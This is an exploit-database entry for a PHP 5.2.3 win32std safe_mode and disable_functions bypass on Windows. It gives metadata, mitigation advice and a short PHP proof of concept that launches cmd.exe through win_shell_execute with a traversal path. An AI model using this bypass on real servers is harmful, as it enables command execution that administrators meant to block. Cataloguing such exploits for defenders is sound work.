PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

vendor:

PHP

by:

shinnai

N/A

CVSS

HIGH

Bypass of safe_mode and disable_functions protections

CWE

Product Name: PHP

Affected Version From: PHP 5.2.3

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2

2007

PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

This exploit allows bypassing the safe_mode and disable_functions protections in PHP 5.2.3 with the win32std extension. It executes the cmd.exe command, either from the command line interface or through Apache. The exploit has been tested on a fully patched Windows XP Professional SP2 system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of PHP and apply any relevant security patches. Additionally, disabling the win32std extension or restricting its usage can help prevent exploitation.

Source

Exploit-DB raw data:

<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Thanks to rgod for all his precious advises :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be wxecuted
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>

# milw0rm.com [2007-07-24]